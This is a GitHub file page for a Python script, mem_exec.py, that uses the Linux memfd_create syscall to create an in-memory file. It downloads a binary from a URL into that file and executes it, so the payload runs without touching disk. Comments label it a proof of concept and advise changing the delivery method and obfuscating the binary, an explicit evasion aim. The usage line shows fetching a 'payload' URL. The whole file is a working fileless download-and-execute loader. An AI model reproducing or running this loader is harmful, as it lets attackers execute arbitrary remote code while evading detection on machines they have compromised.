-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathmem_exec.py
More file actions
38 lines (34 loc) · 1.07 KB
/
mem_exec.py
File metadata and controls
38 lines (34 loc) · 1.07 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#!/usr/bin/python
# Andres Doreste
# Just a PoC! won't work on Kernels < 3.17
# Change the delivery method and don't forget obfuscate the binary (;
import ctypes
import os
import sys
if sys.version_info < (3,0):
from urllib import urlretrieve
else:
from urllib.request import urlretrieve
class MemDownExec:
def __init__(self):
self.libc = ctypes.CDLL(None)
self.syscall = self.libc.syscall
self.proc_number = str(os.getpid())
def create_mem_file(self):
# http://man7.org/linux/man-pages/man2/memfd_create.2.html
fd = self.syscall(319, "", 1)
mem_file_path = os.path.join("/proc", self.proc_number, "fd", str(fd))
return mem_file_path
def down_exec(self, file_url, mem_file_path, argv):
urlretrieve(file_url, mem_file_path)
os.execv(mem_file_path, argv)
if __name__ == "__main__":
if len(sys.argv) < 2:
print("[+] Usage:")
print("[+] {} URL ARGS".format(sys.argv[0]))
print("[>] {} http://127.0.0.1/payload".format(sys.argv[0]))
exit(1)
url = sys.argv[1]
mde = MemDownExec()
fd = mde.create_mem_file()
mde.down_exec(url, fd, sys.argv[0:1] + sys.argv[2::])